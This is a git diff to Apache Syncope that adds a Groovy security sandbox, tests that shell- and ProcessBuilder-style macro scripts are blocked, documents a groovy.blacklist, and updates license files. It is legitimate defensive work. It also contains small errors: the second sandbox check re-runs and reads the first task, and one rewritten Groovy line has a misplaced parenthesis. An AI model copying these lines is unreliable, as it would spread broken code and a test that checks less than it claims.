+        task.setMacroActions("ProcessBuilderMacroActions");
+
+        Response response = TASK_SERVICE.create(TaskType.MACRO, task);
+        String firstTaskKey = response.getHeaderString(RESTHeaders.RESOURCE_KEY);
+        assertNotNull(firstTaskKey);
+        TASK_SERVICE.execute(new ExecSpecs.Builder().key(firstTaskKey).build());
+
+        ExecTO exec = await().atMost(MAX_WAIT_SECONDS, TimeUnit.SECONDS).pollInterval(1, TimeUnit.SECONDS).until(() -> {
+            try {
+                return TASK_SERVICE.read(TaskType.MACRO, firstTaskKey, true).getExecutions().get(0);
+            } catch (Exception e) {
+                return null;
+            }
+        }, e -> e != null && !"JOB_FIRED".equals(e.getStatus()));
+        assertEquals(ExecStatus.FAILURE.name(), exec.getStatus());
+        assertTrue(exec.getMessage().startsWith("java.lang.SecurityException: Insecure call to"));
+
+        createMacroActionsIfNeeded(
+                "BashMacroActions",
+                ImplementationEngine.GROOVY,
+                IOUtils.toString(
+                        getClass().getResourceAsStream("/BashMacroActions.groovy"), StandardCharsets.UTF_8));
+
+        task = new MacroTaskTO();
+        task.setName("groovySecuritySandbox" + UUID.randomUUID().toString());
+        task.setActive(true);
+        task.setRealm("/odd");
+        task.setMacroActions("BashMacroActions");
+
+        response = TASK_SERVICE.create(TaskType.MACRO, task);
+        String secondTaskKey = response.getHeaderString(RESTHeaders.RESOURCE_KEY);
+        assertNotNull(secondTaskKey);
+        TASK_SERVICE.execute(new ExecSpecs.Builder().key(firstTaskKey).build());
+
+        exec = await().atMost(MAX_WAIT_SECONDS, TimeUnit.SECONDS).pollInterval(1, TimeUnit.SECONDS).until(() -> {
+            try {
+                return TASK_SERVICE.read(TaskType.MACRO, firstTaskKey, true).getExecutions().get(0);
+            } catch (Exception e) {
+                return null;
+            }
+        }, e -> e != null && !"JOB_FIRED".equals(e.getStatus()));
+        assertEquals(ExecStatus.FAILURE.name(), exec.getStatus());
+        assertTrue(exec.getMessage().startsWith("java.lang.SecurityException: Insecure call to"));
+    }
 }

@@ -16,8 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
-
 import org.apache.syncope.core.provisioning.api.pushpull.PullActions
 import org.apache.syncope.common.lib.request.AnyUR;
 import org.apache.syncope.common.lib.to.EntityTO;
@@ -34,14 +32,13 @@ import org.apache.syncope.common.lib.request.AttrPatch;
 /**
  * Class for integration tests: add new resource and put a password only for it.
  */
-@CompileStatic
 class AddResourcePullActions implements PullActions {
 
   void beforeUpdate(
-          final ProvisioningProfile<?, ?> profile,
-          final SyncDelta delta,
-          final EntityTO entity,
-          final AnyUR anyUR) throws JobExecutionException {
+    final ProvisioningProfile<?, ?> profile,
+    final SyncDelta delta,
+    final EntityTO entity,
+    final AnyUR anyUR) throws JobExecutionException {
 
     if (anyUR instanceof UserUR) {
       UserUR userUR = (UserUR) anyUR;
@@ -66,4 +63,4 @@ class AddResourcePullActions implements PullActions {
       userUR.getResources().add(resPatchItem);
     }
   }
-}
\ No newline at end of file
+}

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.time.OffsetDateTime
 import org.apache.syncope.common.lib.request.AnyUR
 import org.apache.syncope.common.lib.types.AuditElements
@@ -25,7 +24,6 @@ import org.apache.syncope.core.provisioning.api.AuditManager
 import org.apache.syncope.core.spring.security.AuthContextUtils
 import org.springframework.beans.factory.annotation.Autowired
 
-@CompileStatic
 class CustomAuditLogicActions implements LogicActions {
 
   @Autowired

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.Attr
 import org.apache.syncope.common.lib.request.AnyCR
 import org.apache.syncope.common.lib.request.AnyUR
@@ -26,7 +25,6 @@ import org.apache.syncope.core.logic.api.LogicActions
 /**
  * Class for integration tests: transform (by making it double) any attribute value for defined schema.
  */
-@CompileStatic
 class DoubleValueLogicActions implements LogicActions {
   
   private static final String NAME = "makeItDouble";
@@ -70,4 +68,4 @@ class DoubleValueLogicActions implements LogicActions {
 
     return input;
   }
-}
\ No newline at end of file
+}

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-
 import org.apache.syncope.common.lib.command.CommandArgs
 import org.apache.syncope.core.logic.SyncopeLogic
 import org.apache.syncope.core.provisioning.api.macro.Command

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.ArrayList;
 import java.util.List;
 import org.apache.commons.lang3.StringUtils;
@@ -28,7 +27,6 @@ import org.apache.syncope.core.persistence.api.entity.Any
 import org.apache.syncope.core.persistence.api.entity.PlainAttrValue
 import org.apache.syncope.core.provisioning.api.data.ItemTransformer;
 
-@CompileStatic
 class PrefixItemTransformer implements ItemTransformer {
 	
   public static String PREFIX = "PREFIX_";

@@ -16,8 +16,7 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.sql.Sql;
-import groovy.sql.DataSet;
+import groovy.sql.Sql
 
 // Parameters:
 // The connector sends the following:
@@ -48,11 +47,11 @@ import groovy.sql.DataSet;
 // !!!! Each Map must contain a '__UID__' and '__NAME__' attribute.
 // This is required to build a ConnectorObject.
 
-log.info("Entering " + action + " Script");
+log.info("Entering " + action + " Script")
 
-def sql = new Sql(connection);
+def sql = new Sql(connection)
 def result = []
-def where = "";
+def where = ""
 
 if (query != null)  {
   // Need to handle the __UID__ in queries
@@ -61,7 +60,7 @@ if (query != null)  {
   }
   
   // We can use Groovy template engine to generate our custom SQL queries
-  def engine = new groovy.text.SimpleTemplateEngine();
+  def engine = new groovy.text.SimpleTemplateEngine()
 
   def whereTemplates = [
     CONTAINS:' WHERE $left ${not ? "NOT " : ""}LIKE "%$right%"',
@@ -74,21 +73,22 @@ if (query != null)  {
     LESSTHANOREQUAL:' WHERE $left ${not ? ">" : "<="} "$right"'
   ]
 
-  def wt = whereTemplates.get(query.get("operation"));
-  def binding = [left:query.get("left"),right:query.get("right"),not:query.get("not")];
-  def template = engine.createTemplate(wt).make(binding);
-  where = template.toString();
+  def wt = whereTemplates.get(query.get("operation"))
+  def binding = [left:query.get("left"),right:query.get("right"),not:query.get("not")]
+  def template = engine.createTemplate(wt).make(binding)
+  where = template.toString()
   log.ok("Search WHERE clause is: "+ where)
 }
 
-switch ( objectClass ) {
+switch (objectClass) {
 case "__PRINTER__":
-  sql.eachRow("SELECT * FROM TESTPRINTER " + where + ((where?.trim ()) ? "AND" : "WHERE") + " deleted <> TRUE", 
-    {result.add([__UID__:it.id, __NAME__:it.id, ID:it.id, PRINTERNAME:it.printername, LOCATION:it.location])} );
+  sql.eachRow("SELECT * FROM TESTPRINTER " + where + ((where?.trim()) ? "AND" : "WHERE") + " deleted <> TRUE") { row -> 
+    result.add([__UID__:row["id"], __NAME__:row["id"], ID:row["id"], PRINTERNAME:row["printername"], LOCATION:row["location"]])
+  }
   break
 
 default:
-  result;
+  result
 }
 
-return result;
+return result

@@ -16,8 +16,7 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.sql.Sql;
-import groovy.sql.DataSet;
+import groovy.sql.Sql
 
 // Parameters:
 // The connector sends the following:
@@ -46,54 +45,52 @@ import groovy.sql.DataSet;
 // "attributes":Map<String,List> of attributes name/values
 // ]
 
-log.info("Entering " + action + " Script");
-def sql = new Sql(connection);
+log.info("Entering " + action + " Script")
+def sql = new Sql(connection)
 
 if (action.equalsIgnoreCase("GET_LATEST_SYNC_TOKEN")) {
   switch (objectClass) {
   case "__PRINTER__":
-    row = sql.firstRow("SELECT lastmodification FROM TESTPRINTER ORDER BY lastmodification DESC");
+    row = sql.firstRow("SELECT lastmodification FROM TESTPRINTER ORDER BY lastmodification DESC")
     log.ok("Get Latest Sync Token script: last token is: " + row["lastmodification"])
-    break;
+    break
     
   default:
-    row = null;
+    row = null
   }
 
-  return row == null ? null : row["lastmodification"].getTime();
+  return row == null ? null : row["lastmodification"].getTime()
 } else if (action.equalsIgnoreCase("SYNC")) {
-  def result = [];
-  def lastmodification = null;
+  def result = []
+  def lastmodification = null
   if (token != null) {
-    lastmodification = new Date(token);
+    lastmodification = new Date(token)
   } else {
-    lastmodification = new Date(0);
+    lastmodification = new Date(0)
   }
 
   switch (objectClass) {
   case "__PRINTER__":
-    sql.eachRow("SELECT * FROM TESTPRINTER WHERE lastmodification > ${lastmodification}",
-      {
-        result.add([
-            operation:it.deleted ? "DELETE": "CREATE_OR_UPDATE", 
-            uid:it.id.toString(), 
-            token:it.lastmodification.getTime(), 
-            attributes:[
-              __UID__:it.id.toString(),
-              __NAME__:it.id.toString(),
-              ID:it.id.toString(),
-              PRINTERNAME:it.printername,
-              LOCATION:it.location
-            ]
-          ]);
-      }
-    )
-    break;
+    sql.eachRow("SELECT * FROM TESTPRINTER WHERE lastmodification > ${lastmodification}") { row ->
+      result.add([
+          operation:row["deleted"] ? "DELETE": "CREATE_OR_UPDATE", 
+          uid:row["id"].toString(), 
+          token:row["lastmodification"].getTime(), 
+          attributes:[
+            __UID__:row["id"].toString(),
+            __NAME__:row["id"].toString(),
+            ID:row["id"].toString(),
+            PRINTERNAME:row["printername"],
+            LOCATION:row["location"]
+          ]
+        ])
+    }
+    break
   }
   
-  log.ok("Sync script: found " + result.size() + " events to sync");
-  return result;
+  log.ok("Sync script: found " + result.size() + " events to sync")
+  return result
 } else {
-  log.error("Sync script: action '" + action + "' is not implemented in this script");
-  return null;
+  log.error("Sync script: action '" + action + "' is not implemented in this script")
+  return null
 }

@@ -16,16 +16,15 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.sql.Sql;
-import groovy.sql.DataSet;
+import groovy.sql.Sql
 
 // Parameters:
 // The connector sends the following:
 // connection: handler to the SQL connection
 // action: a string describing the action ("TEST" here)
 // log: a handler to the Log facility
 
-log.info("Entering " + action + " Script");
-def sql = new Sql(connection);
+log.info("Entering " + action + " Script")
+def sql = new Sql(connection)
 
-sql.eachRow("select * from TESTPRINTER", { println it.id} );
\ No newline at end of file
+sql.eachRow("select * from TESTPRINTER"), { row -> println row["id"] }

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.to.Provision
 import org.apache.syncope.core.persistence.api.dao.search.AttrCond
 import org.apache.syncope.core.persistence.api.dao.search.SearchCond
@@ -26,7 +25,6 @@ import org.identityconnectors.framework.common.objects.SyncDelta
 /**
  * Test pull rule relying on {@code email} attribute value.
  */
-@CompileStatic
 class TestPullRule implements PullCorrelationRule {
 
   @Override

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.to.Provision
 import org.apache.syncope.core.persistence.api.entity.Any
 import org.apache.syncope.core.persistence.api.entity.ExternalResource
@@ -28,7 +27,6 @@ import org.identityconnectors.framework.common.objects.filter.FilterBuilder
 /**
  * Test push rule relying on {@code email} attribute value.
  */
-@CompileStatic
 class TestPushRule implements PushCorrelationRule {
 
   @Override

@@ -21,9 +21,7 @@ import org.identityconnectors.framework.common.objects.ObjectClass
 import org.identityconnectors.framework.common.objects.filter.Filter
 import org.identityconnectors.framework.common.objects.filter.FilterBuilder
 import org.apache.syncope.core.provisioning.api.pushpull.ReconFilterBuilder
-import groovy.transform.CompileStatic
 
-@CompileStatic
 class TestReconFilterBuilder implements ReconFilterBuilder {
 
   private static final Filter EQUALS = FilterBuilder.equalTo(AttributeBuilder.build("SURNAME", "Rossi"));

@@ -395,10 +395,10 @@ under the License.
     <project.build.outputTimestamp>2025-08-08T07:58:59Z</project.build.outputTimestamp>
     <syncope.version>${project.version}</syncope.version>
 
-    <connid.version>1.5.2.1</connid.version>
+    <connid.version>1.5.3.0-SNAPSHOT</connid.version>
     <connid.soap.version>1.4.5</connid.soap.version>
-    <connid.rest.version>1.0.8</connid.rest.version>
-    <connid.db.version>2.3.0</connid.db.version>
+    <connid.rest.version>1.0.9-SNAPSHOT</connid.rest.version>
+    <connid.db.version>2.3.1-SNAPSHOT</connid.db.version>
     <connid.csvdir.version>0.8.9</connid.csvdir.version>
     <connid.ldap.version>1.5.10</connid.ldap.version>
     <connid.ad.version>1.4.0</connid.ad.version>
@@ -1048,10 +1048,22 @@ under the License.
         <version>${groovy.version}</version>
       </dependency>
 
+      <dependency>
+        <groupId>net.tirasa</groupId>
+        <artifactId>groovy-security-sandbox</artifactId>
+        <version>1.0.0-SNAPSHOT</version>
+      </dependency>
+
       <dependency>
         <groupId>com.icegreen</groupId>
         <artifactId>greenmail</artifactId>
         <version>1.6.15</version>
+        <exclusions>
+          <exclusion>
+            <groupId>junit</groupId>
+            <artifactId>junit</artifactId>
+          </exclusion>
+        </exclusions>
       </dependency>
 
       <dependency>

@@ -953,11 +953,6 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
-For Joda Time (http://www.joda.org/joda-time/):
-This is licensed under the AL 2.0, see above.
-
-==
-
 For json-smart-v2 (https://github.com/netplex/json-smart-v2):
 This is licensed under the AL 2.0, see above.
 

@@ -33,6 +33,15 @@ Customizing and extending the Core behavior by uploading a Groovy class via REST
 platform, allows to speed up the development cycle and can be used as Swiss army knife for maintenance and
 administration.
 
-Please beware that granting the permission to manage Implementations to non-admin users can result in security threat,
-as there is virtually no limitation in what the Groovy code has access to.
+Please beware that granting the permission to manage Implementations to non-admin users shall be performed with great
+care. The Groovy code is anyway going to be executed in a sandbox, where the set of forbidden classes and methods
+can be configured on each deployment. +
+Check the provided
+ifeval::["{snapshotOrRelease}" == "release"]
+https://github.com/ilgrosso/syncope/blob/syncope-{docVersion}/core/spring/src/main/resources/META-INF/groovy.blacklist[groovy.blacklist^]
+endif::[]
+ifeval::["{snapshotOrRelease}" == "snapshot"]
+https://github.com/ilgrosso/syncope/blob/4_0_X/core/spring/src/main/resources/META-INF/groovy.blacklist[groovy.blacklist^]
+endif::[]
+.
 ====

@@ -237,6 +237,16 @@ This is licensed under the MIT license, see above.
 
 ==
 
+For balanced-match (https://github.com/juliangruber/balanced-match):
+This is licensed under the MIT license, see above.
+
+==
+
+For base64-js (https://github.com/beatgammit/base64-js):
+This is licensed under the MIT license, see above.
+
+==
+
 For Bootbox.js (http://bootboxjs.com/):
 This is licensed under the MIT license, see above.
 
@@ -257,6 +267,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For Chart.js (http://www.chartjs.org/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For CodeMirror (http://codemirror.net/):
 This is licensed under the MIT license, see above.
 
@@ -776,12 +791,12 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
-For mchange-commons-java (https://github.com/swaldman/mchange-commons-java):
-This is licensed under the EPL 1.0, see above.
+For Microsoft OAuth 2.0 User Agent library for Java (https://github.com/Microsoft/oauth2-useragent):
+This is licensed under the MIT license, see above.
 
 ==
 
-For Microsoft OAuth 2.0 User Agent library for Java (https://github.com/Microsoft/oauth2-useragent):
+For Microsoft Azure Active Directory Authentication Library (ADAL) for Java (https://github.com/AzureAD/azure-activedirectory-library-for-java):
 This is licensed under the MIT license, see above.
 
 ==
@@ -806,6 +821,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For Okta Java Management SDK (https://github.com/okta/okta-sdk-java):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Moshi (https://square.github.io/moshi/1.x):
 This is licensed under the AL 2.0, see above.
 
@@ -1217,37 +1237,12 @@ of liability.
 
 ==
 
-For Eclipse Metro (https://projects.eclipse.org/projects/ee4j.metro):
-This is licensed under the EDL 1.0:
-
-Eclipse Distribution License - v 1.0
-
-Copyright (c) 2007, Eclipse Foundation, Inc. and its licensors.
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
-following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this list of conditions and the following
-  disclaimer.
-* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
-  disclaimer in the documentation and/or other materials provided with the distribution.
-* Neither the name of the Eclipse Foundation, Inc. nor the names of its contributors may be used to endorse or promote
-  products derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, 
-INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 
-WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
-THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
+For QDox (https://github.com/paul-hammant/qdox):
+This is licensed under the AL 2.0, see above.
 
 ==
 
-For QDox (https://github.com/paul-hammant/qdox):
+For UnboundID LDAP SDK for Java (https://github.com/pingidentity/ldapsdk):
 This is licensed under the AL 2.0, see above.
 
 ==
@@ -1282,6 +1277,11 @@ This is Public Domain.
 
 ==
 
+For css-vars-ponyfill (https://github.com/jhildenbiddle/css-vars-ponyfill):
+This is licensed under the MIT license, see above.
+
+==
+
 For DataTables (https://datatables.net/):
 This is licensed under the MIT license, see above.
 
@@ -1293,7 +1293,32 @@ This is licensed under the AL 2.0, see above.
 ==
 
 For Jakarta Activation (https://eclipse-ee4j.github.io/jaf/):
-This is licensed under the EDL 1.0, see above.
+This is licensed under the EDL 1.0:
+
+Eclipse Distribution License - v 1.0
+
+Copyright (c) 2007, Eclipse Foundation, Inc. and its licensors.
+
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
+following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this list of conditions and the following
+  disclaimer.
+* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
+  disclaimer in the documentation and/or other materials provided with the distribution.
+* Neither the name of the Eclipse Foundation, Inc. nor the names of its contributors may be used to endorse or promote
+  products derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, 
+INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 
+WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
+THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
 
 ==
 
@@ -1317,6 +1342,11 @@ This is licensed under the MIT license, see above.
 
 ==
 
+For get-css-data (https://github.com/jhildenbiddle/get-css-data):
+This is licensed under the MIT license, see above.
+
+==
+
 For google-diff-match-patch (https://code.google.com/archive/p/google-diff-match-patch/):
 This is licensed under the AL 2.0, see above.
 
@@ -1332,6 +1362,11 @@ This is licensed under the BSD license, see above.
 
 ==
 
+For Inputmask (https://github.com/RobinHerbots/Inputmask):
+This is licensed under the MIT license, see above.
+
+==
+
 For Metrics (http://dropwizard.github.io/metrics/):
 This is licensed under the AL 2.0, see above.
 
@@ -1342,6 +1377,11 @@ This is licensed under the MIT license, see above.
 
 ==
 
+For jsonwebtoken.io (https://jsonwebtoken.io):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Micrometer Application Metrics (https://micrometer.io/):
 This is licensed under the AL 2.0, see above.
 
@@ -1392,6 +1432,11 @@ This is licensed under the CDDL 1.0, see above.
 
 ==
 
+For JSR107 (JCache) (https://github.com/jsr107/jsr107spec):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Expression Language 3.0 API (https://javaee.github.io/uel-ri/):
 This is licensed under the CDDL 1.0, see above.
 
@@ -1462,6 +1507,16 @@ This is licensed under the MIT license, see above.
 
 ==
 
+For Material Components for the web (https://github.com/material-components/material-components-web):
+This is licensed under the MIT license, see above.
+
+==
+
+For Webfont - Material Design Icons (https://github.com/Templarian/MaterialDesign-Webfont):
+This is licensed under the MIT license, see above.
+
+==
+
 For Modernizr (https://modernizr.com):
 This is licensed under the MIT license, see above.
 
@@ -1497,6 +1552,16 @@ This is licensed under the CDDL 1.0, see above.
 
 ==
 
+For Groovy Security Sandbox (https://github.com/Tirasa/groovy-security-sandbox):
+This is licensed under the MIT license, see above.
+
+==
+
+For normalize.css (http://necolas.github.io/normalize.css/):
+This is licensed under the MIT license, see above.
+
+==
+
 For Groovy Extensions (https://github.com/ultraq/groovy-extensions/):
 This is licensed under the AL 2.0, see above.
 
@@ -1567,11 +1632,6 @@ This is licensed under the MIT license, see above.
 
 ==
 
-For MojoHaus AnimalSniffer Maven Plugin (https://github.com/mojohaus/animal-sniffer):
-This is licensed under the MIT license, see above.
-
-==
-
 For StAX2 API (http://wiki.fasterxml.com/WoodstoxStax2):
 This is licensed under the BSD license, see above.
 
@@ -1582,6 +1642,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For groovy-sandbox (https://github.com/craftercms/groovy-sandbox):
+This is licensed under the MIT license, see above.
+
+==
+
 For Cryptacular (https://github.com/vt-middleware/cryptacular):
 This is licensed under the AL 2.0, see above.
 
@@ -1592,6 +1657,11 @@ This is licensed under the MIT license, see above.
 
 ==
 
+For Ehcache (http://ehcache.org/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Flowable (http://www.flowable.org/):
 This is licensed under the AL 2.0, see above.
 
@@ -1757,11 +1827,6 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
-For Chart.js (http://www.chartjs.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
 For Moment.js (http://momentjs.com/):
 This is licensed under the MIT license, see above.
 
@@ -1772,47 +1837,32 @@ This is licensed under the MIT license, see above.
 
 ==
 
-For balanced-match (https://github.com/juliangruber/balanced-match):
-This is licensed under the MIT license, see above.
-
-==
-
-For base64-js (https://github.com/beatgammit/base64-js):
-This is licensed under the MIT license, see above.
-
-==
-
-For css-vars-ponyfill (https://github.com/jhildenbiddle/css-vars-ponyfill):
-This is licensed under the MIT license, see above.
-
-==
-
-For get-css-data (https://github.com/jhildenbiddle/get-css-data):
-This is licensed under the MIT license, see above.
+For WicketStuff (https://wicketstuff.org/):
+This is licensed under the AL 2.0, see above.
 
 ==
 
-For Inputmask (https://github.com/RobinHerbots/Inputmask):
-This is licensed under the MIT license, see above.
+For SnakeYAML (http://www.snakeyaml.org/):
+This is licensed under the AL 2.0, see above.
 
 ==
 
-For Material Components for the web (https://github.com/material-components/material-components-web):
+For popper.js (https://github.com/FezVrasta/popper.js):
 This is licensed under the MIT license, see above.
 
 ==
 
-For Webfont - Material Design Icons (https://github.com/Templarian/MaterialDesign-Webfont):
+For spin.js (http://spin.js.org/):
 This is licensed under the MIT license, see above.
 
 ==
 
-For normalize.css (http://necolas.github.io/normalize.css/):
+For Summernote (https://summernote.org/):
 This is licensed under the MIT license, see above.
 
 ==
 
-For Summernote (https://summernote.org/):
+For Tempus Dominus Bootstrap 4 Datetime Picker (https://github.com/tempusdominus/bootstrap-4):
 This is licensed under the MIT license, see above.
 
 ==
@@ -1827,42 +1877,17 @@ This is licensed under the BSD license, see above.
 
 ==
 
-For window.fetch polyfill (https://github.github.io/fetch/):
-This is licensed under the MIT license, see above.
-
-==
-
-For WicketStuff (https://wicketstuff.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For SnakeYAML (http://www.snakeyaml.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For popper.js (https://github.com/FezVrasta/popper.js):
-This is licensed under the MIT license, see above.
-
-==
-
-For spin.js (http://spin.js.org/):
-This is licensed under the MIT license, see above.
-
-==
-
-For Tempus Dominus Bootstrap 4 Datetime Picker (https://github.com/tempusdominus/bootstrap-4):
+For typeahead.js (http://twitter.github.io/typeahead.js/):
 This is licensed under the MIT license, see above.
 
 ==
 
-For typeahead.js (http://twitter.github.io/typeahead.js/):
+For Webjars-locator core functionality (https://github.com/webjars/webjars-locator-core):
 This is licensed under the MIT license, see above.
 
 ==
 
-For Webjars-locator core functionality (https://github.com/webjars/webjars-locator-core):
+For window.fetch polyfill (https://github.github.io/fetch/):
 This is licensed under the MIT license, see above.
 
 ==

@@ -1,5 +1,5 @@
 Apache Syncope
-Copyright 2012-2023 The Apache Software Foundation
+Copyright 2012-2025 The Apache Software Foundation
 
 This product includes software developed by:
 The Apache Software Foundation (http://www.apache.org/).
@@ -23,6 +23,16 @@ Copyright (c) 2013 Kohsuke Kawaguchi and other contributors
 
 ==
 
+This product includes software developed by balanced-match
+Copyright (c) 2013 Julian Gruber <julian@juliangruber.com>
+
+==
+
+This product includes software developed by base64-js
+Copyright (c) 2014 Jameson Little
+
+==
+
 This product includes software developed by the Bootbox.js project.
 Copyright (C) 2011-2015 by Nick Payne nick@kurai.co.uk
 
@@ -38,6 +48,11 @@ Copyright (c) 2013-2015 bootstrap-select]
 
 ==
 
+This product includes software developed by the Chart.js project.
+Copyright (c) 2018 Chart.js Contributors
+
+==
+
 This product includes software developed by the Modernizr project.
 Copyright (C) 2016
 
@@ -154,13 +169,13 @@ Copyright (c) 2006 - 2019, Wael Chatila and GreenMail project contributors
 
 ==
 
-This product includes software developed by mchange-commons-java
-Copyright (C) 2015 Machinery For Change, Inc.
+This product includes software developed by Microsoft OAuth 2.0 User Agent library for Java
+Copyright (c) Microsoft Corporation
 
 ==
 
-This product includes software developed by Microsoft OAuth 2.0 User Agent library for Java
-Copyright (c) Microsoft Corporation
+This product includes software developed by Microsoft Azure Active Directory Authentication Library (ADAL) for Java
+Copyright (c) Microsoft Corporation. All rights reserved.
 
 ==
 
@@ -184,11 +199,6 @@ Copyright 2012-2022, Connect2id Ltd
 
 ==
 
-This product includes software developed by Okio
-Copyright 2013 Square, Inc.
-
-==
-
 This product includes software developed by Moshi
 Copyright (C) 2020 Square, Inc.
 
@@ -199,6 +209,11 @@ Copyright (c) 2022 Square, Inc.
 
 ==
 
+This product includes software developed by Okio
+Copyright 2013 Square, Inc.
+
+==
+
 This product includes software developed by Retrofit
 Copyright 2014 Square, Inc.
 
@@ -214,13 +229,13 @@ Copyright (c) 2013-2016 The JAXB project.
 
 ==
 
-This product includes software produced and maintained by Eclipse Metro
-All content is the property of the respective authors or their employers.
+This product includes software developed by QDox.
+Copyright 2002-2009 Joe Walnes and QDox Project Team
 
 ==
 
-This product includes software developed by QDox.
-Copyright 2002-2009 Joe Walnes and QDox Project Team
+This product includes software developed by UnboundID LDAP SDK for Java
+Copyright 2007-2022 Ping Identity Corporation
 
 ==
 
@@ -248,6 +263,11 @@ This product includes software developed by Dough Lea
 
 ==
 
+This product includes software developed by css-vars-ponyfill
+Copyright (c) 2018 John Hildenbiddle
+
+==
+
 This product includes software developed by DataTables
 Copyright (c) 2008-present, SpryMedia Limited
 
@@ -278,6 +298,11 @@ Copyright (C) 2009-2016 Kristopher Michael Kowal and contributors
 
 ==
 
+This product includes software developed by get-css-data
+Copyright (c) 2018 John Hildenbiddle
+
+==
+
 This product includes software developed by the google-diff-match-patch project.
 Copyright (c) 2006 Google Inc.
 
@@ -293,6 +318,11 @@ Copyright (c) 2006, Ivan Sagalaev
 
 ==
 
+This product includes software developed by Inputmask
+Copyright (c) 2010 - 2018 Robin Herbots
+
+==
+
 This product includes software developed by the Metrics project.
 Copyright (c) 2010-2014 Coda Hale, Yammer.com
 
@@ -303,7 +333,12 @@ Copyright (c) 2020 Luke Hutchison
 
 ==
 
-This product includes software developed by Micrometer Application Metrics
+This product includes software developed by jsonwebtoken.io.
+Copyright (C) 2014-2023 jsonwebtoken.io
+
+==
+
+This product includes software developed by Micrometer Application Metrics.
 Copyright (c) 2017-Present VMware, Inc. All Rights Reserved.
 
 ==
@@ -349,6 +384,11 @@ Copyright (c) 2012-2013 Oracle and/or its affiliates. All rights reserved.
 
 ==
 
+This product includes software developed by JSR107 (JCache).
+Copyright (c) JSR107 Expert Group
+
+==
+
 This product includes software developed by Expression Language 3.0 API
 Copyright (c) 1997-2013 Oracle and/or its affiliates. All rights reserved.
 
@@ -415,6 +455,11 @@ Copyright (c) 2010 - 2014 jsPlumb, http://jsplumbtoolkit.com/
 
 ==
 
+This product includes software developed by Material Components for the web
+Copyright 2018 Google Inc.
+
+==
+
 This product includes software developed by Byte Buddy
 Copyright 2014 - Present Rafael Winterhalter
 
@@ -432,6 +477,17 @@ Copyright 2011-2016 Tirasa S.r.l. All rights reserved.
 
 ==
 
+This product includes software developed by Groovy Security Sandbox
+Copyright (c) 2012-2020 Kohsuke Kawaguchi, CloudBees, Inc., other contributors
+Copyright (c) 2025 Tirasa
+
+==
+
+This product includes software developed by normalize.css
